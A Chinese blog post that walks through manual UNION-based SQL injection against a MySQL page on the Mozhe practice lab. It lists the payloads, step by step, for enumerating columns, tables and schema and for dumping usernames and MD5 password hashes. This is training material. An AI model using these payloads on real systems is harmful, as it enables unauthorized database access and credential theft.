sql手工注入漏洞测试(MYSQL)-墨者-url信息

已于 2023-11-23 02:38:10 修改
阅读量622 收藏 1
点赞数 1
分类专栏: 靶场攻防 文章标签: sql mysql 数据库 web安全 安全 网络
于 2023-11-23 02:36:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weoptions/article/details/134566854
版权

背景:

        自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

        md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

weoptions
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
如果响应结果中出现了非预期的信息,那么很可能存在SQL注入漏洞。 #### 三、DB2 SQL注入 1. **DB2特性**:DB2是一种关系型数据库管理系统,与其他类型的数据库相比,其SQL语法和处理方式可能存在差异。在本例中,...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
1. **墨者靶场**:提供了黑盒和白盒环境下的命令执行与代码执行漏洞模拟,帮助测试和学习漏洞利用和防御。 2. **Javaweb-Struts2框架类RCE漏洞**:Struts2框架中的某些版本存在远程代码执行漏洞,通过精心构造的请求...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
SQL 时间盲注 (injection 第十六关)
baishiqi12的博客
08-20 488
SQL 注入,仅供参考
数据库查询大量数据避免内存溢出的方法
huan1213858的博客
08-23 141
每次查询一定数量数据之后记录id,进行数据处理之后再继续查询继续处理,
SQL】关注者数量
Frost_Descent的博客
08-23 272
(user_id, follower_id) 是这个表的主键(具有唯一值的列的组合)。count计数,count(follower_id) followers_count。该表包含一个关注关系中关注者和用户的编号,其中关注者关注用户。使用order by升序排列order by user_id。编写解决方案,对于每一个用户,返回该用户的关注者数量。按照用户id分组,group by user_id。查询结果的格式如下示例所示。2 的关注者有 {0,1}0 的关注者有 {1}1 的关注者有 {0}
[数据库][知识]SQL Server、MySQL 和 Oracle 的默认端口和数据库链接
一名不太专业的程序员
08-17 400
请确保在实际使用中,根据您自己的数据库配置(如主机名、端口、数据库名、用户名和密码等)来调整上述连接信息。同时,确保已经添加了相应数据库的 JDBC 驱动到您的项目依赖中。SQL Server、MySQL 和 Oracle 的默认端口号、连接 URL 和驱动类名。请注意,SQL Server 的 JDBC URL 格式可能需要根据实际的数据库实例进行调整,例如,如果数据库实例名称不是默认的。参数用于指定字符集,如果需要其他字符集设置,可能需要调整这些参数。指定了连接的主机和端口,
SQL,将多对多的关联记录按行输出
smilejingwei的博客
08-19 263
要求从两张表中找出符合条件W=100,H=500,D=300的记录,先输出Primay里的一行,再输出相关联的Secondary的每一行。A3:A2为空时返回空,A2不为空时,循环A1的每条记录 ~,合并 ~ 和 A2,最后再合并循环的结果。数据库的Primary表和Secondary表有相同的结构,其中W、H、D是主键。A1、A2:执行简单SQL,条件查询。
SQL-DCL-数据控制语言
DEVIL_hym的博客
08-23 103
一、 DCL-管理用户。二、DCL-权限控制。
mysql创建quartz定时任务相关表sql
xiexf20230814的博客
08-20 507
-存储Cron触发器的cron表达式和其他信息。--接下来,创建索引以提高性能;--存储简单触发器的额外属性。--存储复杂触发器的简单属性。--存储触发器的blob数据。--存储已触发的触发器信息。--存储调度器的状态信息。--存储暂停的触发器组。--存储触发器信息
Pandas DataFrame:数据处理利器及其在 Excel 和 SQL 数据处理中的便利性
weixin_43866043的博客
08-19 968
在数据分析和数据科学的世界里,Python 的 pandas 库无疑是最受欢迎的工具之一。而其中的 DataFrame 是一个功能强大、灵活且广泛应用的数据结构。对于那些经常处理 Excel 数据或 SQL 数据库数据的人来说,pandas.DataFrame 提供了无与伦比的便利性和效率。本文将介绍 pandas.DataFrame 的基本概念,并探讨它在处理 Excel 数据和 SQL 数据时所带来的诸多便利之处。什么是 Pandas DataFrame?
SQLserver在SQL Server Management Studio 20中的默认值和设置主键自增
愿你历尽千帆,归来仍是少年。
08-20 868
你可以创建一个默认约束,为列提供一个用户定义的默认值。
SQL关键字检测持续优化,太难了
qq_37148232的博客
08-19 277
【代码】SQL关键字检测优化持续优化,太难了。
SQL进阶技巧:如何按任意时段分析时间区间问题? | 区间重叠问题应用
石榴姐yyds
08-23 55
本文分析了一种按任意时段计算时间区间问题的方法和思路,其本质是区间重叠问题的应用,文中给出了两种方法,一种按照区间重叠的方式进行分情况讨论划分区间,找出重叠区间,并计算问题,一种按照区间展开的形式形成全量的明细表,基于明细表求解任意给定的时段统计问题
在Windows下安装配置SQL Server 2022
Rick的博客
08-19 400
Microsoft SQL Server 是一种关系数据库管理系统 (RDBMS)。应用程序和工具连接到 SQL Server 实例或数据库,并使用 Transact-SQL (T-SQL) 进行通信。
PostgreSQL 内核资源管理
最新发布
分享关于Java编程、数据库管理和信息安全方面的最佳实践
08-23 523
PostgreSQL 有时会耗尽各种操作系统资源限制,特别是在同一系统上运行多个服务器实例或在非常大的安装环境中。此部分解释了 PostgreSQL 使用的内核资源,以及解决与内核资源消耗相关问题的步骤。
【PGCCC】PostgreSQL 死锁揭秘:如何检测与解决死锁问题的详细指南
PGCCC的博客
08-23 683
PostgreSQL 的死锁检测机制通过锁等待图的构建和环路检测,能够有效地识别和处理死锁问题。了解其工作原理和处理策略对于优化数据库性能和提高系统稳定性至关重要。在实际应用中,及时分析和处理死锁情况,并优化数据库操作,可以减少死锁的发生,从而提升数据库的整体效率。
墨者-sql手工注入漏洞测试
04-29
在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weoptions

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值